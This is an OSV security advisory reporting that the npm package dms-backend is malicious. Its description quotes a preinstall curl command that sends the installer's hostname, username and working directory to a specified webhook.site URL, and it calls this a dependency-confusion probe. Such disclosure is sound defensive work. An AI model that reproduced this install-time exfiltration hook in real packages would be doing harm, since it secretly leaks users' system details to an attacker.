MAL-2026-5826

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/dms-backend/MAL-2026-5826.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5826

Published

2026-06-15T20:08:26Z

Modified

2026-06-15T20:31:54.474164982Z

Summary

Malicious code in dms-backend (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (bd479ea3869dae33e183f9164c4e9c7c11a2170728288012647fe2af4d55426e)

package.json declares a preinstall lifecycle script that runs curl --data-urlencode "info=$(hostname && whoami && pwd)" against a webhook.site collector URL (https://webhook.site/1ea0386f-dcc0-4f1b-bdbb-61732d6535fb/dms-backend). This fires automatically on npm install and leaks installer-side identifiers — hostname, current OS user, and install working directory — to an attacker-controlled webhook bin. The package ships no real functionality; the preinstall recon beacon is the package's only behavior, which is the canonical shape of a dependency-confusion reconnaissance probe (the name dms-backend suggests targeting an internal/private registry name to hijack installs of an organization's private package).

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "bd479ea3869dae33e183f9164c4e9c7c11a2170728288012647fe2af4d55426e",
            "source": "amazon-inspector",
            "modified_time": "2026-06-15T20:08:26Z",
            "versions": [
                "1.0.0"
            ],
            "id": "IN-MAL-2026-006700",
            "import_time": "2026-06-15T20:14:29.220997713Z"
        }
    ]
}

References

https://www.npmjs.com/package/dms-backend/v/1.0.0

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / dms-backend

Package

Name: dms-backend; View open source insights on deps.dev
Purl: pkg:npm/dms-backend

Affected ranges

Affected versions

1.*

1.0.0

Database specific

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/dms-backend/MAL-2026-5826.json"

indicators

{
    "evidence_files": [
        {
            "sha256": "338916c2e01099c0c8e71d8487d254cbc1fcddd66db3984107bd982cf115719d",
            "tlsh": "07d02bf00e7063735edd86b02d21b158e5345b0f00d46a085ad20114608a1ea205b6ae",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-0RqwX1ewwpUniSryKqXKYkw+WJztsL8b+myU54BZHz6BUiTm6/86ZIrboYpGinKFbqqJcL8MIDTLs+52pqcZNg==",
                "sha1": "473fe5739d7e7ca5b6957482779cbc835efe5d90"
            },
            "filename": "dms-backend-1.0.0.tgz"
        }
    ]
}